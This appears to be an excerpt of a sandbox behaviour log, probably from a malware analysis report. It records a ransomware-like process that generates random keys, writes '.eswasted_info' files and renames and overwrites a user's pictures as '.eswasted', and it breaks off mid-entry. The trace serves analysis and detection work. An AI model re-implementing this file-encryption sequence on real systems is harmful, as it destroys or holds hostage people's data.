lstrcpyW (in: lpString1=0x71ec7e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.560] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.560] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.561] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.561] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FOgY.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fogy.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.561] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.563] SetEndOfFile (hFile=0x108) returned 1 [0079.563] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.563] lstrcpyW (in: lpString1=0x71ec7e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FOgY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fogy.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FOgY.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fogy.png.eswasted")) returned 1 [0079.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FOgY.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fogy.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.641] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.644] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.645] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.645] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.645] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.645] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.645] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.654] SetEndOfFile (hFile=0x108) returned 1 [0079.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.656] CloseHandle (hObject=0x108) returned 1 [0079.689] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.689] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0079.690] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.690] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.690] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0oQXKwAc05.bmp") returned 71 [0079.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x71ec18 [0079.690] lstrcpyW (in: lpString1=0x71eca6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0079.690] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0079.691] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0079.691] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0oQXKwAc05.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0oqxkwac05.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.691] WriteFile (in: hFile=0x108, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.692] SetEndOfFile (hFile=0x108) returned 1 [0079.692] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0079.693] lstrcpyW (in: lpString1=0x71eca6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0oQXKwAc05.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0oqxkwac05.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0oQXKwAc05.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0oqxkwac05.bmp.eswasted")) returned 1 [0079.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0oQXKwAc05.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0oqxkwac05.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.694] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0079.695] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0079.696] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0079.696] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.696] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0079.697] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.697] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.705] SetEndOfFile (hFile=0x108) returned 1 [0079.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0079.707] CloseHandle (hObject=0x108) returned 1 [0079.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.711] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0079.712] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.712] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0Re_20qftIA1.jpg") returned 73 [0079.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29c) returned 0x71ec18 [0079.712] lstrcpyW (in: lpString1=0x71ecaa, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.713] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0079.713] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.713] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0Re_20qftIA1.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0re_20qftia1.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.714] WriteFile (in: hFile=0x108, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.715] SetEndOfFile (hFile=0x108) returned 1 [0079.715] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.715] lstrcpyW (in: lpString1=0x71ecaa, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0Re_20qftIA1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0re_20qftia1.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0Re_20qftIA1.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0re_20qftia1.jpg.eswasted")) returned 1 [0079.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\0Re_20qftIA1.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\0re_20qftia1.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0079.716] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.717] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0079.718] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0079.718] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.718] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0079.719] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.719] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.773] SetEndOfFile (hFile=0x108) returned 1 [0079.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.775] CloseHandle (hObject=0x108) returned 1 [0079.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.777] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0079.778] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.778] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\8kmCdZ.png") returned 67 [0079.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x71ec18 [0079.779] lstrcpyW (in: lpString1=0x71ec9e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.779] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.779] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0079.780] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.780] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\8kmCdZ.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\8kmcdz.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.780] WriteFile (in: hFile=0x108, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.781] SetEndOfFile (hFile=0x108) returned 1 [0079.782] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.782] lstrcpyW (in: lpString1=0x71ec9e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\8kmCdZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\8kmcdz.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\8kmCdZ.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\8kmcdz.png.eswasted")) returned 1 [0079.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\8kmCdZ.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\8kmcdz.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.796] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.799] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.800] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.800] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.800] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.801] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.801] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.809] SetEndOfFile (hFile=0x108) returned 1 [0079.811] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0079.811] CloseHandle (hObject=0x108) returned 1 [0079.813] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.813] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.846] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.846] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\AGcrbui3.jpg") returned 69 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x294) returned 0x71ec18 [0079.846] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.846] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.847] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.847] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\AGcrbui3.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\agcrbui3.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.848] WriteFile (in: hFile=0x108, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.849] SetEndOfFile (hFile=0x108) returned 1 [0079.849] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.849] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\AGcrbui3.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\agcrbui3.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\AGcrbui3.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\agcrbui3.jpg.eswasted")) returned 1 [0079.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\AGcrbui3.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\agcrbui3.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.855] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.858] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.858] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0079.859] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.859] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.860] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.860] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.869] SetEndOfFile (hFile=0x108) returned 1 [0079.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.871] CloseHandle (hObject=0x108) returned 1 [0079.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.873] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.873] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.873] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.874] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\m4xB_9.jpg") returned 67 [0079.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x7175f0 [0079.874] lstrcpyW (in: lpString1=0x717676, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.874] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.874] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.874] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\m4xB_9.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\m4xb_9.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.875] WriteFile (in: hFile=0x108, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.876] SetEndOfFile (hFile=0x108) returned 1 [0079.876] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.876] lstrcpyW (in: lpString1=0x717676, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\m4xB_9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\m4xb_9.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\m4xB_9.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\m4xb_9.jpg.eswasted")) returned 1 [0079.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\m4xB_9.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\m4xb_9.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.878] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.880] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.881] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0079.881] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.881] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.881] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.881] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.890] SetEndOfFile (hFile=0x108) returned 